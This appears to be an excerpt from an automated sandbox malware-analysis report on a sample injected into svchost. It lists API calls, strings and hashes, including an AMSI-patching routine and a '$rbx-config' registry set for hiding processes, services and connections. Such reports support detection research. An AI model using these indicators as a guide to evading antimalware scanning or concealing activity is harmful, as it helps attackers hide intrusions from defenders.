                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction ID: 4c053896abf497d96071b4309c6c02f7f596486a49a2d1bd45f1df66b4f49580
                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction Fuzzy Hash: 3E5190B9198E4AE5EB04DF64EC417D43720B7DC347FA04513A4993E272DE789A6BCB80

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProcSleep
                                  • String ID: AmsiScanBuffer$amsi.dll
                                  • API String ID: 188063004-3248079830
                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction ID: ded0c7d0441ca8acc662626e2673fbba77aa7577a5bd333bc019f25f1f1bcf63
                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction Fuzzy Hash: F1D0127A615D00F1E908AB10DC503D433217BDCB43FF00814C44E29371DE2C8C6B8B10

                                  Control-flow Graph

                                  APIs
                                  • GetModuleFileNameW.KERNEL32 ref: 00000158709D3A35
                                  • PathFindFileNameW.SHLWAPI ref: 00000158709D3A44
                                    • Part of subcall function 00000158709D3F88: StrCmpNIW.KERNELBASE(?,?,?,00000158709D272F), ref: 00000158709D3FA0
                                    • Part of subcall function 00000158709D3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3EDB
                                    • Part of subcall function 00000158709D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3F0E
                                    • Part of subcall function 00000158709D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3F2E
                                    • Part of subcall function 00000158709D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3F47
                                    • Part of subcall function 00000158709D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000158709D3A5B), ref: 00000158709D3F68
                                  • CreateThread.KERNELBASE ref: 00000158709D3A8B
                                    • Part of subcall function 00000158709D1E74: GetCurrentThread.KERNEL32 ref: 00000158709D1E7F
                                    • Part of subcall function 00000158709D1E74: CreateThread.KERNELBASE ref: 00000158709D2043
                                    • Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2049
                                    • Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2055
                                    • Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2061
                                    • Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D206D
                                    • Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2079
                                    • Part of subcall function 00000158709D1E74: TlsAlloc.KERNEL32 ref: 00000158709D2085
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                  • String ID:
                                  • API String ID: 2779030803-0
                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                  • Instruction ID: 27e660130ceafbbeb60a36b15d8e932c03324a6b7c904a276c5479b962a21c25
                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                  • Instruction Fuzzy Hash: DD11403E7A8E09D2FB609B21AD493D93290A7DC347FB081159486B92D6DF78C4568E50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 54 158709d3f88-158709d3f93 55 158709d3f95-158709d3fa8 StrCmpNIW 54->55 56 158709d3fad-158709d3fb4 54->56 55->56 57 158709d3faa 55->57 57->56
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $rbx-
                                  • API String ID: 0-3661604363
                                  • Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                  • Instruction ID: 9e1dcff7dcb0904ccd5c3180fb8a25bb3454f700ec6f186123d0db67a26fca22
                                  • Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                  • Instruction Fuzzy Hash: 90D05E7A762B0AD6FB149FA59CD07E473609B88746F589025D91029110DF588D9FCE10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction ID: bd5ca5f642ab86e21cca34bb4256160e0d42c92a1db00a46c7891cc540fa75cb
                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction Fuzzy Hash: 0E913BB6709A50C7DB548F25D800BBDB391F788B96F64C125EE496B788DE34D813DB00

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00000158709D1724: GetProcessHeap.KERNEL32 ref: 00000158709D172F
                                    • Part of subcall function 00000158709D1724: HeapAlloc.KERNEL32 ref: 00000158709D173E
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17AE
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17DB
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D17F5
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1815
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1830
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1850
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D186B
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D188B
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D18A6
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D18C6
                                  • SleepEx.KERNELBASE ref: 00000158709D1BDF
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D18E1
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1901
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D191C
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D193C
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1957
                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1977
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1992
                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D199C
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                  • String ID:
                                  • API String ID: 948135145-0
                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                  • Instruction ID: 99afdf321e2277e0836023fd661ca6caa5315dd7e74dd3d36231a4d3ee5876e6
                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                  • Instruction Fuzzy Hash: C631037F2D4E49E1EB509B36ED403E933A4A7CCBC2F2454219E49AF397DF14C4528A14

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                  • API String ID: 2135414181-3414887735
                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction ID: 34eba271fe64f6e87b97d7e2c74a7b09dd64441d5f66f9b03ff91c9cb90ed8e9
                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction Fuzzy Hash: 4E71073B614E54E6EB109F75EC507D933A4FBC8B8AF501111EA4D6BB29DE34C856CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction ID: de339c0fb1de0677f009c575950b8b3d51883e1f70b30aad39766b42995028c3
                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction Fuzzy Hash: 8FD17FBA608B40C6EB609F65DC403DE77A0F7D9799F204115EE896BB96DF34C182DB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: ecc2726804282fe2a17d08a4c5024c43b5ef019938767f2e6cf263d55aaa75da
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: BD81A2B9608E41C6FA54DB659C423E9B2D0ABCE786F3540159908BF396DF38C847EF00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID: Thread$Current$Context
                                  • String ID:
                                  • API String ID: 1666949209-0
                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction ID: 59c74060c04ae75cc36f545caf049ef16840bd4a7e17b3c313b3edb9e8559638
                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction Fuzzy Hash: 5BD16A7A248F48C5DA60DB1AE89439AB7A0F3CCB85F604116EACD5B769DF39C551CF00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID: CombinePath
                                  • String ID: \\.\pipe\
                                  • API String ID: 3422762182-91387939
                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction ID: a6f3d1c687b8db6c68a94a19b5b10f27886df43c305b5d726ad5c77cda59f1b8
                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction Fuzzy Hash: 1CF089B9704F84D1EA544B13BD142997251B78CFC2F649030ED565FB69CE2CC8578B00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: d7d2215471525ce6f65d07c58f0532b280a199a0fc6e1af3ccf6d9864cfbd952
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: 985193BA108A40CBEB748F21DD443997790F399B96F344116DA49ABBD5CF38C852DF41
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: 231f09d94d4f40c4da4ed4df95580b63def9bc2c6fe1ce20596efff4a7009f8d
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: F8616E76508BC8C5DB219B15E8407DAB7A0F7C9B95F144215EB982BB96DF7CC1A2CF00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 3242871069-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 0b78fa305994587dd4c0c82ff328e02ddb1d51e691a3adc279623a161738457c
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: 6351D47A319E00CAEB54CB15D844BAEB391F388B99F258525DE566B788DF78C843DB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000003.2214017403.00000158709A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd
                                  Similarity
                                  • API ID: CallTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3163161869-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: 169ee3feb2000ee2d0486e255a8b31a50d7b388d9299a103b641fc723a4832d7
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: 61618BB6508FC4C1EB619B15E8403DAB7A0F7C9B99F244215EB992BB99DF78C191CB00